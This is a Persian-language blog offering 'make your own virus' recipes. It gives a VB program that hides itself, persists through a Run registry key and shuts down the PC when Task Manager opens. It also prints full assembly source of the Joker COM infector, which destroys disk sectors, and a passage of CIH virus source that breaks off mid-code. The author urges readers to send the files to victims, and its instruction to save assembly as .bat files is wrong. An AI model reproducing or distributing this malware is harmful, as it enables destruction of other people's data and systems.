+ نوشته شده در شنبه دوازدهم آبان 1386ساعت 6:24 قبل از ظهر توسط mahyar |

به ویروسی فکر کنید که هر چند ثانیه یه بار refresh کنه و این واسه وقتی تو اینترنت میچرخیم یه فاجعه است. این که ملت فکر کنن یه چیزیت هست که هر نظر رو ۲ بار میدی فقط بخشی از اون مشکلاته.

خب چطور میتونیم به این مهم !! دست پیدا کنیم؟ اگه گفتین؟ خیلی ساده :ما باید یه ویروسی بسازیم که پشت سر هم کلید f5 رو فعال کنه: خب چجوری؟

خیلی ساده اما جذاب

مواد لازم: فقط یه تایمر

خب بریم سر وقت کدا:

Private Sub Timer1_Timer()
SendKeys {f5}", 1
End Sub

Private Sub Form_Load()
Timer1.Interval = 1000
End Sub

+ نوشته شده در شنبه دوازدهم آبان 1386ساعت 6:20 قبل از ظهر توسط mahyar |

اسم این ویروس: من اینجام.اگه میتونی منو بگیر !!

دوستان این که یه ویروس ردی از خودش باقی نذاره خیلی مهمه ولی گاهی اوقات آدم دلش میخواد به دلایلی یه نام ونشونی از خودش بذاره که دلایل مختلفی داره .از جمله این که به یارو بفهمونه منم ویروس بلدم بنویسم!!!(این کار بخصوص نزد تازه کارها از جمله خودم رواج بیشتری داره)

ویروس این دفعه بصورتیه که یه اخطار میاد بالا به کاربر میگه فلان کار رو نکن و اگه کاربر این کار رو کرد خب مام میفتیم به جونش دیگه

وسایل لازم: فقط یه تایمر!

کدها:

Private Sub Form_Load()
App.TaskVisible = False
timer1.interval=1

Me.Hide

Set Reg = CreateObject("wscript.shell")
Reg.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\" & App.EXEName, App.Path & "\" & App.EXEName & ".exe"
Timer1.Interval = 1
End Sub

Private Sub Timer1_Timer()
MsgBox "Dont press alt+ctrl+del", vbCritical, "This is not a virus !!"

Dim handel As Long
handel = FindWindow(vbNullString, "Windows Task Manager")
If handel <> 0 Then
Shell "shutdown -s -t 2 "
End Sub

و اما توضیحات:

خیلی ساده . این ویروس ابتدا اخطار میده که Windows Task Manager رو اجرا نکنین و اگه شما این کار رو کردین تابع Shell "shutdown رو اجرا میکنه

+ نوشته شده در شنبه دوازدهم آبان 1386ساعت 6:17 قبل از ظهر توسط mahyar |

یک ویروس خطرناک با نام Joker (کد ويروس)

یک ویروس خطرناک با نام Joker

برای ساخت این ویروس اول note pad را باز کرده و این کد ها را در آن کپی و پیست نمایید و بعد گزینه file را زده save as را زده بعد آنرا با پسوند bat ذخیره کنید مثلا Joker.bat و save را برای اتمام کار زده و حالا ویروس شما ساخته شد که مواظب باشید روی آن به هیچ وجه کلیک نکنید آنرا برای یکی بفرستید تا سیستم قربانی را به طور خفن داغون کنه. موفق باشید نظر یادتون نره!

title " Joker! virus. Written by The BOOT SECTOR Infector ... " ; ; Joker - This is a remake of the deceased "Joker/Jocker" virus. The original ; had multiple programming errors in it that kept it from replicating. ; My version is much more successful. ; page 255,80 code segment word public 'code' assume cs:code,ds:code org 100h main proc;edure ;EQUates... idc equ 69h ;ID character - (note: 69) cr equ 13 ;ASCII for carriage return lf equ 10 ;ASCII for line feed ;End codes. These determine what happens after the string is displayed. terminate equ 0 ;Terminate program after display halt equ 1 ;Cause the system to hang after display SimulateCritErr equ 2 ;Simulate the critical error handler return2host equ 3 ;Resume program immediately FlashFloppy equ 4 ;Wait for a key, then reset Drive A: WaitKey equ 5 ;Wait for a key, then resume program PauseKey equ 6 ;Same thing, but uses a pause message StackError equ 7 ;Cause a stack overflow (halts system) tof: ;Top-Of-File jmp begin ;Skip over program idchar: db idc ;ID character HostProgram: nop ;First run copy only! nop ;First run copy only! first_four: nop ;First run copy only! address: int 20h ;First run copy only! check: nop ;First run copy only! begin: call nextline ;Push IP+3 onto stack nextline: pop bp ;mov bp,ip sub bp,offset nextline ;bp=disp. for mem locs push ax ;Save AX call cryptor ;Decrypt jmp short retloc ;Continue program cryptor: mov al,[bp+offset encrypt_val] ;encrypt val lea si,[bp+offset toec] ;Top Of Encrypted Code mov cx,offset eoec-offset toec ;Length of " " cryptorloop: xor [si],al ;en/de crypt rol al,cl ;change code # inc si ;Next char please! loop cryptorloop ;loop if necessary ret ;Return to caller infect: call cryptor ;Encrypt code pop cx ;Restore CX for INT 21 int 21h ;Call DOS call cryptor ;Decrypt code ret ;Go back toec:;ؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤTop Of Encrypted Code InfectIt: push cx ;Save CX for sub jmp infect retloc: pop ax ;Restore AX xor di,di ;DI = 0 cli ;Disable interrupts mov ss,di ;Set up stack at: mov sp,2F0h ; 0000:02F0 sti ;Enable interrupts mov si,96h ;Vector for INT 24h mov bx,ss:[si] ;BX = offset in segment mov cx,ss:[si+2] ;CX = segment lea dx,[bp+offset int24handler] ;CS:DX -} local handler mov ss:[si],DX ;Save offset mov ss:[si+2],cs ;Save segment mov si,es:[di+2F8h] ;Check operation mode cmp si,4643h ;'CF' if already TSRed jne GoOn ;Nope, jmp jmp return ;Yes, don't do anything GoOn: mov cs:[di+4Ch],bx ;use unused part of PSP mov cs:[di+4Eh],cx ; to save BX and CX push cs ;Copy CS ... pop es ; ... to DS mov byte ptr [bp+offset infected],0 ;Reset infection count mov byte ptr [bp+offset max2kill],3 ;Stop after 3 or less GoOn2: lea si,[bp+offset first_four] ;Original first 4 bytes mov di,offset tof ;TOF never changes cld ;Read left-to-right movsw ;Copy the 4 bytes movsw ;Copy the 4 bytes mov ah,1Ah ;Set DTA address ... lea dx,[bp+offset DTA] ; ... to *our* DTA int 21h ;Call DOS to set DTA mov ah,4Eh ;Find First ASCIIZ lea dx,[bp+offset filespec] ;DS:DX -} '*.COM',0 lea si,[bp+offset filename] ;Point to file push dx ;Save DX jmp short continue ;Continue... return: mov ah,1ah ;Set DTA address ... mov dx,80h ; ... to default DTA int 21h ;Call DOS to set DTA xor di,di ;DI= 0 mov es,di ;ES= 0 mov si,96h ;Vector for INT 24h mov bx, cs:[di+4Ch] ;Restore from saved BX mov word ptr es:[si+0], bx ;Place back into vector mov cx, cs:[di+4Eh] ;Restore from saved CX mov word ptr es:[si+2], cx ;Place back into vector push cs ;Move CS ... pop es ; ... to ES mov ax,[bp+offset SavedAX] ;Restore AX xor bx,bx ;BX= 0 mov cx,bx ;CX= 0 mov dx,cx ;DX= 0 mov si,dx ;SI= 0 mov di,si ;DI= 0 mov sp,0FFFEh ;SP= FFFEh (normal) mov bp,100h ;BP= 100h (RETurn addr) push bp ; Put on stack mov bp,ax ;BP= 0 ret ;JMP to 100h nextfile: or bx,bx ;Did we open the file? jz skipclose ;No, so don't close it mov ah,3Eh ;Close file int 21h ;Call DOS to close it xor bx,bx ;Set BX back to 0 skipclose: mov ah,4Fh ;Find Next ASCIIZ continue: pop dx ;Restore DX push dx ;Re-save DX xor cx,cx ;CX= 0 xor bx,bx int 21h ;Find First/Next jnc skipjmp jmp NoneLeft ;Out of files skipjmp: mov ax,3D02h ;open file mov dx,si ;point to filespec int 21h ;Call DOS to open file jc nextfile ;Next file if error mov bx,ax ;get the handle mov ah,3Fh ;Read from file mov cx,4 ;Read 4 bytes lea dx,[bp+offset first_four] ;Read in the first 4 int 21h ;Call DOS to read cmp byte ptr [bp+offset check],idc ;Already infected? je nextfile ;Yep, try again ... ;NOTE: Delete the two lines above if you want it to re-infected programs. cmp byte ptr [bp+offset first_four],77 ;Mis-named .EXE? je nextfile ;Yep, maybe next time! mov ax,4202h ;LSeek to EOF xor cx,cx ;CX= 0 xor dx,dx ;DX= 0 int 21h ;Call DOS to LSeek cmp ah,0F8h ;Longer than 62K? ja nextfile ;Yep, try again... mov [bp+offset addr],ax ;Save call location mov ah,40h ;Write to file mov cx,4 ;Write 4 bytes lea dx,[bp+offset first_four] ;Point to buffer int 21h ;Save the first 4 bytes mov ah,[bp+offset encrypt_val] ;Get code number inc ah ;add 1 adc ah,0 ;increment if it's zero mov [bp+offset encrypt_val],ah ;Save new code number mov ah,40h ;Write to file mov cx,offset eof-offset begin ;Length of target code lea dx,[bp+offset begin] ;Point to virus start call InfectIt ;Exempt from encryption ComeBackHere: mov ax,4200h ;LSeek to TOF xor cx,cx ;CX= 0 xor dx,dx ;DX= 0 int 21h ;Call DOS to LSeek mov ax,[bp+offset addr] ;Retrieve location inc ax ;Adjust location mov [bp+offset address],ax ;address to call mov byte ptr [bp+offset first_four],0E9h ;JMP rel16 inst. mov byte ptr [bp+offset check],idc ;EOFMARK mov ah,40h ;Write to file mov cx,4 ;Write 4 bytes lea dx,[bp+offset first_four] ;4 bytes are at [DX] int 21h ;Write to file inc byte ptr [bp+offset infected] ;increment counter dec byte ptr [bp+offset max2kill] ;decrement counter jz TheEnd ;If 0 then End inc byte ptr [bp+offset encrypt_val] ;change code # adc byte ptr [bp+offset encrypt_val],0 ;adjust if 0 jmp nextfile ;Next victim! NoneLeft: cmp byte ptr [bp+offset infected],3 ;At least 3 infected? jae TheEnd ;The party's over! mov di,100h ;DI= 100h cmp word ptr [di],20CDh ;an INT 20h? je TheEnd ;Don't go to prev. dir. lea dx,[bp+offset prevdir] ;'..' mov ah,3Bh ;Set current directory int 21h ;CHDIR .. jc TheEnd ;We're through! mov ah,4Eh jmp continue ;Start over in new dir TheEnd: xor di,di ;DI= 0 mov es,di ;ES= 0 mov ah,2ah ;Get date int 21h ;Do it cmp dl,4 ;4th of the month? jne test2 ;Nope, second test cmp dh,7 ;July? jne test2 ;Nope, second test xor ax,ax ;Sector 0 jmp Kill ;Kill the disk now... test2: mov ah,2ch ;Get time int 21h ;Do it or cl,cl ;On the hour? (x:00 xM) jnz GiveUp ;Return to program cmp ch,6 ;Midnight to 5 AM ??? jnl GiveUp ;Return to program add cl,ch ;Add first number mov ax,cx ;Transfer to AX cbw ;Zero out AH add al,dh ;Add DL to AL adc al,dl ;Add DL and carry flag adc ah,0 ;Add carry to AH or ax,ax ;AX = 0 ??? jnz Kill ;Kill the disk now... inc ax ;Well, adjust first... Kill: mov dx,ax ;Sector number mov cx,1 ;One at a time.... xor bx,bx ;Point at PSP mov ah,19h ;Get current disk int 21h ;Call DOS to ^ int 26h ;Now kill the disk GiveUp: mov bx,offset message_table ;point to table mov ah,2ch ;Get time int 21h ;Call DOS to ^ inc dh ;(0-59) timeloop: cmp dh,msgs ;mapped yet? jl timedone ;Yes, jump sub dh,msgs ;try to map it jmp short timeloop ;and check out work timedone: mov al,dh ;AL gets msg # mov cl,al ;Save in CL for CritErr cbw ;AH gets 0 shl ax,1 ;AX = AX * 2 add bx,ax ;BX = index mov si,[bx] ;SI points to string mov ch,[si-1] ;CH is technique # mov dx,si ;DX points to string mov ah,9 ;Display string int 21h ;Call DOS to ^ cmp ch,terminate ;Terminate program? je TerminateProg ;Nope, next test cmp ch,halt ;Halt program? je $ ;Hang system if ch=halt cmp ch,SimulateCritErr ;Simulate CritErr? je simulate ;yes, go do it cmp ch,Return2host ;Return to host? je ResumeProgram ;yes, go do it cmp ch,FlashFloppy ;Flash drive A:? je FlashFlop ;Yes, go do it cmp ch,WaitKey ;Wait for keypress? je zwait ;Yes, go do it cmp ch,PauseKey ;Pause message w/ wait? je zpause ;Yes, go do it cmp ch,StackError ;Stack overflow? je StackErr ;Yes, go do it ;Invalid code, assume Return2host ResumeProgram: jmp return ;Return to caller StackErr: call $ ;Cause stack overflow TerminateProg: int 20h ;Yep, all done! simulate: lea dx,[bp+offset ARIFmsg] ;Abort, Retry ... mov ah,9 ;Print string int 21h ;Call DOS to ^ mov ah,1 ;Input a char int 21h ;Call DOS to ^ lea dx,[bp+offset crlf] ;crlf mov ah,9 ;Print string int 21h ;Call DOS to ^ cmp al,'a' ;Uppercase? jb uppercase ;Nope, jump sub al,' ' ;Yes, make uppercase uppercase: cmp al,'A' ;Abort? je terminateprog ;Yep, go do it. cmp al,'R' ;Retry? jne zskip ;skip over "retry" code lea dx,[bp+offset crlf] ;Point to crlf mov ah,9 ;Print string int 21h ;Call DOS to ^ mov dh,cl ;Restore DH from CL jmp timedone ;Reprint error zskip: cmp al,'I' ;Ignore? je ResumeProgram ;Return to host program cmp al,'F' ;Fail? jne simulate ;Invalid response lea dx,[bp+offset fail24] ;Point to fail string mov ah,9 ;Print string int 21h ;Call DOS to ^ int 20h ;Terminate program FlashFlop: mov ah,1 ;Wait for keypress int 21h ;Call DOS to ^ xor ax,ax ;Drive A: mov cx,1 ;Read 1 sector mov dx,ax ;Start at boot sector lea bx,[bp+offset boot_sector] ;BX points to buffer int 25h ;Flash light on A: jmp short ResumeProgram ;Resume if no error zpause: lea dx,[bp+offset pause] ;Point to pause message mov ah,9 ;Print string int 21h ;Call DOS to ^ zwait: mov ah,1 ;Wait for keypress int 21h ;Call DOS to ^ jmp short ResumeProgram ;Go on... ARIFmsg db cr,lf,'Abort, Retry, Ignore, Fail?$' fail24 db cr,lf,cr,lf,'Fail on INT 24' crlf db cr,lf,'$' message_table: dw offset msg1 dw offset msg2 dw offset msg3 dw offset msg4 dw offset msg5 dw offset msg6 dw offset msg7 dw offset msg8 dw offset msg9 dw offset msg10 dw offset msg11 dw offset msg12 dw offset msg13 dw offset msg14 dw offset msg15 dw offset msg16 dw offset msg17 dw offset msg18 dw offset msg19 dw offset msg20 msgs db 20 ; I tried to make it as simple as possible to change the messages ; and add/delete them. Each message is in the format: ; ; db [technique] ;[label] db [Text] ; ; Where [technique] is one of the 8 codes shown at the beginning of ; this file (terminate, halt, etc.). This determines what the virus ; should do after printing the message. ; [label] is in the form "msg##" where ## is a number from 1 to ; "msgs". "msgs" is defined immediately before this ; comment block. ; [text] is a combination of text and ASCII codes, terminated by ; either a '$' or a ,36. ; ; If you change the number of messages the virus has, you should also ; add/remove lines from the offset table and change the "msgs" ; data byte appropriately. Let's say for instance that you want ; to remove "Program too big to fit in memory.": ; 1) Delete the line(s) with the message and the line ; immediately before it. ; 2) Move message #20 up to message #2's position and ; change its label from "msg20" to "msg2". ; 3) Delete the line "dw offset msg20" from the offset ; table. ; 4) Change the line before this comment block to: ; "msgs db 19" ; ; Later! ; -The BOOT SECTOR Infector ... ; db FlashFloppy ;Waits for key, then flashes drive A: msg5 db 'I',39,'m hungry! Insert PIZZA & BEER into drive A: and',cr,lf pause db 'Strike any key when ready... $' db SimulateCritErr ;Prints ARIF message and responds appropriately msg1 db 'Impotence error reading user',39,'s dick$' db terminate ;Ends the program immediately msg2 db 'Program too big to fit in memory',cr,lf,'$' db halt ;Halts the system msg3 db 'Cannot load COMMAND, system halted',cr,lf,'$' db terminate ;Ends the program immediately msg4 db 'I',39,'m sorry, Dave.... but I',39,'m afraid' db ' I can',39,'t do that!',cr,lf,'$' db WaitKey ;Waits for a keypress, then runs the program msg6 db 'Format another? (Y/N)? $' db StackError ;Generates a stack overflow (halts the system) msg7 db 'Damn it! I told you not to touch that!$' db terminate ;Ends the program immediately msg8 db 'Suck me!',cr,lf,'$' db SimulateCritErr ;Prints ARIF message and responds appropriately msg9 db 'Cocksucker At Keyboard error reading device CON:$' db terminate ;Ends the program immediately msg10 db 7,cr,cr,cr,7,cr,cr,cr,7,cr,cr,cr,lf db 'I',39,'m sorry, but your call cannot be completed as dialed.' db cr,lf,'Please hang up & try your call again.',cr,lf,'$' db terminate ;Ends the program immediately msg11 db 'No!',cr,lf,cr,lf,'$' db halt ;Halts the system msg12 db 'Panic kernal mode interrupt$' db WaitKey ;Waits for a keypress, then runs the program msg13 db 'CONNECT 1200«',cr,lf,cr,lf,'$' db return2host ;Runs host program immediately msg14 db 'Okay, okay! Be patient! ...',cr,lf,'$' db terminate ;Ends the program immediately msg15 db 'And if I refuse?',cr,lf,'$' db return2host ;Runs host program immediately msg16 db 'Fuck the world and its followers!',cr,lf,'$' db return2host ;Runs host program immediately msg17 db 'You are pathetic, man... you know that?',cr,lf,'$' db terminate ;Ends the program immediately msg18 db 'Cum on! Talk DIRTY to me !!!',cr,lf,'$' db terminate ;Ends the program immediately msg19 db 'Your coprocessor wears floppy disks!',cr,lf,'$' db PauseKey ;Waits for keypress (SAKWR), then runs host prg msg20 db 'Joker! ver àà by TBSI!',cr,lf db 'Remember! EVERYTHING',39,'s bigger in Texas!',cr,lf,'$' int24handler: xor al,al ;Ignore the error iret ;Interrupt return filespec: db '*.COM',0 ;File specification prevdir: db '..',0 ;previous directory max2kill db 3 ;max. files to infect eoec:;ؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤEnd Of Encrypted Code VersionNumber dw 100h ;Version 1.00 encrypt_val db 0 ;1st-run copy only ; None of this information is included in the virus's code. It is only used ; during the search/infect routines and it is not necessary to preserve it ; in between calls to them. eof: DTA: db 21 dup (?) ;internal search's data attribute db ? ;attribute file_time db 2 dup (?) ;file's time stamp file_date db 2 dup (?) ;file's date stamp file_size db 4 dup (?) ;file's size filename db 13 dup (?) ;filename SavedAX dw ? ;Used to save AX infected db ? ;infection count addr dw ? ;Address boot_sector: main endp;rocedure code ends;egment end

+ نوشته شده در چهارشنبه نهم آبان 1386ساعت 8:17 بعد از ظهر توسط mahyar |

و یروس خطرناک با نام Good Gory بساز ید! (کد ويروس)

و یروس خطرناک با نام Good Gory بساز ید!

برای ساخت این ویروس اول note pad را باز کرده و این کد ها را در آن کپی و پیست نمایید و بعد گزینه file را زده save as را زده بعد آنرا با پسوند bat ذخیره کنید مثلا Good Gory.bat و save را برای اتمام کار زده و حالا ویروس شما ساخته شد که مواظب باشید روی آن به هیچ وجه کلیک نکنید آنرا برای یکی بفرستید تا سیستم قربانی را به طور خفن داغون کنه موفق باشید نظر یادتون نره!

; **************************************************************************** ; * The Virus Program Information * ; **************************************************************************** ; * * ; * Designer : CIH Source : TTIT of TATUNG in Taiwan * ; * Create Date : 04/26/1998 Now Version : 1.4 * ; * Modification Time : 05/31/1998 * ; * * ; * Turbo Assembler Version 4.0 : tasm /m cih * ; * Turbo Link Version 3.01 : tlink /3 /t cih, cih.exe * ; * * ; *==========================================================================* ; * Modification History * ; *==========================================================================* ; * v1.0 1. Create the Virus Program. * ; * 2. The Virus Modifies IDT to Get Ring0 Privilege. * ; * 04/26/1998 3. Virus Code doesn't Reload into System. * ; * 4. Call IFSMgr_InstallFileSystemApiHook to Hook File System. * ; * 5. Modifies Entry Point of IFSMgr_InstallFileSystemApiHook. * ; * 6. When System Opens Existing PE File, the File will be * ; * Infected, and the File doesn't be Reinfected. * ; * 7. It is also Infected, even the File is Read-Only. * ; * 8. When the File is Infected, the Modification Date and Time * ; * of the File also don't be Changed. * ; * 9. When My Virus Uses IFSMgr_Ring0_FileIO, it will not Call * ; * Previous FileSystemApiHook, it will Call the Function * ; * that the IFS Manager Would Normally Call to Implement * ; * this Particular I/O Request. * ; * 10. The Virus Size is only 656 Bytes. * ; *==========================================================================* ; * v1.1 1. Especially, the File that be Infected will not Increase * ; * it's Size... ^__^ * ; * 05/15/1998 2. Hook and Modify Structured Exception Handing. * ; * When Exception Error Occurs, Our OS System should be in * ; * Windows NT. So My Cute Virus will not Continue to Run, * ; * it will Jmup to Original Application to Run. * ; * 3. Use Better Algorithm, Reduce Virus Code Size. * ; * 4. The Virus "Basic" Size is only 796 Bytes. * ; *==========================================================================* ; * v1.2 1. Kill All HardDisk, and BIOS... Super... Killer... * ; * 2. Modify the Bug of v1.1 * ; * 05/21/1998 3. The Virus "Basic" Size is 1003 Bytes. * ; *==========================================================================* ; * v1.3 1. Modify the Bug that WinZip Self-Extractor Occurs Error. * ; * So When Open WinZip Self-Extractor ==> Don't Infect it. * ; * 05/24/1998 2. The Virus "Basic" Size is 1010 Bytes. * ; *==========================================================================* ; * v1.4 1. Full Modify the Bug : WinZip Self-Extractor Occurs Error. * ; * 2. Change the Date of Killing Computers. * ; * 05/31/1998 3. Modify Virus Version Copyright. * ; * 4. The Virus "Basic" Size is 1019 Bytes. * ; **************************************************************************** .586P ; **************************************************************************** ; * Original PE Executable File(Don't Modify this Section) * ; **************************************************************************** OriginalAppEXE SEGMENT FileHeader: db 04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h db 004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000h db 0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 040h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 080h, 000h, 000h, 000h db 00eh, 01fh, 0bah, 00eh, 000h, 0b4h, 009h, 0cdh db 021h, 0b8h, 001h, 04ch, 0cdh, 021h, 054h, 068h db 069h, 073h, 020h, 070h, 072h, 06fh, 067h, 072h db 061h, 06dh, 020h, 063h, 061h, 06eh, 06eh, 06fh db 074h, 020h, 062h, 065h, 020h, 072h, 075h, 06eh db 020h, 069h, 06eh, 020h, 044h, 04fh, 053h, 020h db 06dh, 06fh, 064h, 065h, 02eh, 00dh, 00dh, 00ah db 024h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000h db 0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 0e0h, 000h, 00fh, 001h db 00bh, 001h, 005h, 000h, 000h, 010h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 010h, 010h, 000h, 000h, 000h, 010h, 000h, 000h db 000h, 020h, 000h, 000h, 000h, 000h, 040h, 000h db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 020h, 000h, 000h, 000h, 002h, 000h, 000h db 000h, 000h, 000h, 000h, 002h, 000h, 000h, 000h db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h db 000h, 000h, 000h, 000h, 010h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 02eh, 074h, 065h, 078h, 074h, 000h, 000h, 000h db 000h, 010h, 000h, 000h, 000h, 010h, 000h, 000h db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 020h, 000h, 000h, 060h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 0c3h, 000h, 000h, 000h, 000h, 000h, 000h, 000h dd 00000000h, VirusSize OriginalAppEXE ENDS ; **************************************************************************** ; * My Virus Game * ; **************************************************************************** ; ********************************************************* ; * Constant Define * ; ********************************************************* TRUE = 1 FALSE = 0 DEBUG = TRUE MajorVirusVersion = 1 MinorVirusVersion = 4 VirusVersion = MajorVirusVersion*10h+MinorVirusVersion IF DEBUG FirstKillHardDiskNumber = 81h HookExceptionNumber = 05h ELSE FirstKillHardDiskNumber = 80h HookExceptionNumber = 03h ENDIF FileNameBufferSize = 7fh ; ********************************************************* ; ********************************************************* VirusGame SEGMENT ASSUME CS:VirusGame, DS:VirusGame, SS:VirusGame ASSUME ES:VirusGame, FS:VirusGame, GS:VirusGame ; ********************************************************* ; * Ring3 Virus Game Initial Program * ; ********************************************************* MyVirusStart: push ebp ; ************************************* ; * Let's Modify Structured Exception * ; * Handing, Prevent Exception Error * ; * Occurrence, Especially in NT. * ; ************************************* lea eax, [esp-04h*2] xor ebx, ebx xchg eax, fs:[ebx] call @0 @0: pop ebx lea ecx, StopToRunVirusCode-@0[ebx] push ecx push eax ; ************************************* ; * Let's Modify * ; * IDT(Interrupt Descriptor Table) * ; * to Get Ring0 Privilege... * ; ************************************* push eax ; sidt [esp-02h] ; Get IDT Base Address pop ebx ; add ebx, HookExceptionNumber*08h+04h ; ZF = 0 cli mov ebp, [ebx] ; Get Exception Base mov bp, [ebx-04h] ; Entry Point lea esi, MyExceptionHook-@1[ecx] push esi mov [ebx-04h], si ; shr esi, 16 ; Modify Exception mov [ebx+02h], si ; Entry Point Address pop esi ; ************************************* ; * Generate Exception to Get Ring0 * ; ************************************* int HookExceptionNumber ; GenerateException ReturnAddressOfEndException = $ ; ************************************* ; * Merge All Virus Code Section * ; ************************************* push esi mov esi, eax LoopOfMergeAllVirusCodeSection: mov ecx, [eax-04h] rep movsb sub eax, 08h mov esi, [eax] or esi, esi jz QuitLoopOfMergeAllVirusCodeSection ; ZF = 1 jmp LoopOfMergeAllVirusCodeSection QuitLoopOfMergeAllVirusCodeSection: pop esi ; ************************************* ; * Generate Exception Again * ; ************************************* int HookExceptionNumber ; GenerateException Again ; ************************************* ; * Let's Restore * ; * Structured Exception Handing * ; ************************************* ReadyRestoreSE: sti xor ebx, ebx jmp RestoreSE ; ************************************* ; * When Exception Error Occurs, * ; * Our OS System should be in NT. * ; * So My Cute Virus will not * ; * Continue to Run, it Jmups to * ; * Original Application to Run. * ; ************************************* StopToRunVirusCode: @1 = StopToRunVirusCode xor ebx, ebx mov eax, fs:[ebx] mov esp, [eax] RestoreSE: pop dword ptr fs:[ebx] pop eax ; ************************************* ; * Return Original App to Execute * ; ************************************* pop ebp push 00401000h ; Push Original OriginalAddressOfEntryPoint = $-4 ; App Entry Point to Stack ret ; Return to Original App Entry Point ; ********************************************************* ; * Ring0 Virus Game Initial Program * ; ********************************************************* MyExceptionHook: @2 = MyExceptionHook jz InstallMyFileSystemApiHook ; ************************************* ; * Do My Virus Exist in System !? * ; ************************************* mov ecx, dr0 jecxz AllocateSystemMemoryPage add dword ptr [esp], ReadyRestoreSE-ReturnAddressOfEndException ; ************************************* ; * Return to Ring3 Initial Program * ; ************************************* ExitRing0Init: mov [ebx-04h], bp ; shr ebp, 16 ; Restore Exception mov [ebx+02h], bp ; iretd ; ************************************* ; * Allocate SystemMemory Page to Use * ; ************************************* AllocateSystemMemoryPage: mov dr0, ebx ; Set the Mark of My Virus Exist in System push 00000000fh ; push ecx ; push 0ffffffffh ; push ecx ; push ecx ; push ecx ; push 000000001h ; push 000000002h ; int 20h ; VMMCALL _PageAllocate _PageAllocate = $ ; dd 00010053h ; Use EAX, ECX, EDX, and flags add esp, 08h*04h xchg edi, eax ; EDI = SystemMemory Start Address lea eax, MyVirusStart-@2[esi] iretd ; Return to Ring3 Initial Program ; ************************************* ; * Install My File System Api Hook * ; ************************************* InstallMyFileSystemApiHook: lea eax, FileSystemApiHook-@6[edi] push eax ; int 20h ; VXDCALL IFSMgr_InstallFileSystemApiHook IFSMgr_InstallFileSystemApiHook = $ ; dd 00400067h ; Use EAX, ECX, EDX, and flags mov dr0, eax ; Save OldFileSystemApiHook Address pop eax ; EAX = FileSystemApiHook Address ; Save Old IFSMgr_InstallFileSystemApiHook Entry Point mov ecx, IFSMgr_InstallFileSystemApiHook-@2[esi] mov edx, [ecx] mov OldInstallFileSystemApiHook-@3[eax], edx ; Modify IFSMgr_InstallFileSystemApiHook Entry Point lea eax, InstallFileSystemApiHook-@3[eax] mov [ecx], eax cli jmp ExitRing0Init ; ********************************************************* ; * Code Size of Merge Virus Code Section * ; ********************************************************* CodeSizeOfMergeVirusCodeSection = offset $ ; ********************************************************* ; * IFSMgr_InstallFileSystemApiHook * ; ********************************************************* InstallFileSystemApiHook: push ebx call @4 ; @4: ; pop ebx ; mov ebx, offset FileSystemApiHook add ebx, FileSystemApiHook-@4 ; push ebx int 20h ; VXDCALL IFSMgr_RemoveFileSystemApiHook IFSMgr_RemoveFileSystemApiHook = $ dd 00400068h ; Use EAX, ECX, EDX, and flags pop eax ; Call Original IFSMgr_InstallFileSystemApiHook ; to Link Client FileSystemApiHook push dword ptr [esp+8] call OldInstallFileSystemApiHook-@3[ebx] pop ecx push eax ; Call Original IFSMgr_InstallFileSystemApiHook ; to Link My FileSystemApiHook push ebx call 